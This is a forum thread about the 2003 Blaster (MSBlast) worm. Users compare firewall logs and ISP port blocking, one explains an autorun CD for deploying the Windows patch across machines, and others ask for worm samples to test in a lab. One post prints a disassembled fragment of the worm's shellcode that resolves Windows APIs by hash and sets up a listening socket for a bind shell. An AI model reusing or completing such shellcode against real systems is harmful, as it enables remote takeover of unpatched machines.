RPC/DCOM/mblast.exe thread discussions/notices

[waverebel]

Anyone with access to BBC 1, looks like they are going to do a peice on msblast in a few mins on the news

[Und3ertak3r]

Anyone with access to BBC 1, looks like they are going to do a peice on msblast in a few mins on the news

bugger... missed it...!!!

Checking my firewall logs this morning.. yeh it is 8am here.. absolutly no hits on port 135, 69, 137 in the last 2.5 hrs.. get the feeling the ISP is blocking those ports.. I wonder how many others are doing the same..

Cheers

[nihil]

I use two ISPs...............as of 06.00GMT today (14 August) FreeUK appeared to be doing this. My other one (Tiscali) was not, and I was getting a lot of hits up until about 2 hours ago (21.30Hrs GMT).

I did post (and got told off for!) the info that lavasoft have an update for Ad-aware that detects this malware..............also found a couple of other bad guys on my box, so it is worth the effort.........

This is newer than my last Ad-aware update post BTW

Cheers

Johnno

[Vorlin]

What I've done is (for windows machines that don't need to use RPC, like my own machines at home) route port 135 through my router to an internal IP address that doesn't exist. In the VERY unlikely event that I got this thing, it wouldn't be able to communicate to the outside because the port it's trying to come back through would go to a null destination. Of course, mandatory updates on antivirus is already done as is updating Microsoft's OS line.

If anyone out there needs to automate the patching for a lot of windows machines, you can do this:

1: Download the Windows 2000 patch or the Windows XP patch. Save it to the desktop.

2: Rename said patch to patch.exe or something similar. It will make the next step easier.

3: Create a new file on the desktop called autorun.inf. Open it in notepad and put the following lines in:

Code:

[autorun]
open=patch.exe -o -f -u

4: Burn these two files to a cd. Because of the autorun.inf and Window's inherent autoplay feature, the patch will automatically run. The -o means it will overwrite existing files, the -f means it will force all processes to die upon reboot signal, and the -u means it will be in unattended mode which makes life a lot easier for administrators running around trying to automate this process on dozens or more workstations.

Problem: it has to be run as administrator (or power users that can add patches to the system) so it's only a little better if you have dozens of regular standard user workstations.

[zrekam]

Just got my hands on the source code for the Blaster worm now.
Got it by a good friend in my mail some hours ago, so soon I gonna have some fun with examining it and see how it's made

[vevogel]

Grinler..anyone

I am trying to find a binary or source code source for the W32/Blaster to put it into our lab for testing. Unfortunatly the gov. agency we support will not allow the Ops support staff change any machine untill in-house testing for effect is compleated. Buearocracy ya gotta love it.

[Grinler]

I got the binary but unfortunately do not have access to the computer its stored on due to the power outage.

Zrekam, Mind sharing the source? Would love to take a look at it.

[zrekam]

here is a snippet of the worms exploit code:
<Snippet>
loc_4AF: ; CODE XREF: seg000:000004A8j

sub esp, 34h

mov esi, esp

call GetKernel32BaseAddy

mov [esi], eax ; EAX is the base address of kernel32.dll

push dword ptr [esi]

push 0EC0E4E8Eh ; corresponds to LoadLibraryA

call ScanForAPI

mov [esi+8], eax

push dword ptr [esi]

push 0CE05D9ADh ; WaitForSingleObject

call ScanForAPI

mov [esi+0Ch], eax

push 6C6Ch

push 642E3233h

push 5F327377h ; ws32_2.dll

push esp

call dword ptr [esi+8]

mov [esi+4], eax ; esi + 4 = HModule of ws32_2.dll

push dword ptr [esi]

push 16B3FE72h ; CreateProcessA

call ScanForAPI

mov [esi+10h], eax

push dword ptr [esi]

push 73E2D87Eh ; ExitProcess

call ScanForAPI

mov [esi+14h], eax

push dword ptr [esi+4]

push 3BFCEDCBh ; WSAStartup

call ScanForAPI

mov [esi+18h], eax

push dword ptr [esi+4]

push 0ADF509D9h ; WSASocketA

call ScanForAPI

mov [esi+1Ch], eax

push dword ptr [esi+4]

push 0C7701AA4h ; bind

call ScanForAPI

mov [esi+20h], eax

push dword ptr [esi+4]

push 0E92EADA4h ; listen

call ScanForAPI

mov [esi+24h], eax

push dword ptr [esi+4]

push 498649E5h ; accept

call ScanForAPI

mov [esi+28h], eax

push dword ptr [esi+4]

push 79C679E7h ; closesocket

call ScanForAPI

mov [esi+2Ch], eax

xor edi, edi

sub esp, 190h

push esp

push 101h

call dword ptr [esi+18h] ; WSAStartup returns 0 if successful

push eax

push eax

push eax

push eax

inc eax

push eax

inc eax

push eax ; call wsasocketa
</snippet>

This is just a little bit of the blaster worm, the rest of the code I am not allowed to reveal.

[steve.milner]

Originally posted here by Und3ertak3r
Noticed an increase in scans on the netbios ports, 137 in particular, as well almost matching the 135? coincidence?

Cheers

I've started getting hits, just like blaster on port 137 at around 8.00pm UTC last night & at the rate of every 10/15 mins.

Anyone know what this is?

<edit>

Actually the starting time may be wrong, but I'd still like to know what this is

</edit>

[Und3ertak3r]

My ISP has decided to UN-Block Port 135..
My firewall log is full of "Block TCP packet on port 135" .. this restarted sometime yesterday (local time) and the Port 135 probes here are as bad as during the 11th and 12th.. I don't want to exagerate.. it seems at the moment to be worse.. but.. I didnt run my system 24/7 at thate time..

I have taken the steps of advising the ISP, and asking why they removed the block, also asking that it may be prudent to re-block port 135..
and just for their records I supplied a short extract from my logs (about 5k).. that should give them enough food for thought.. or atleast some emailing to the users of those systems "You are infected" warnings.. Most of the ip's are from within their domains.. ie 144.134.XXX.XXX

I wonder howmany other ISP's have decided to unblock that port.. certainly shows (from here) the infection is still rampent..

Cheers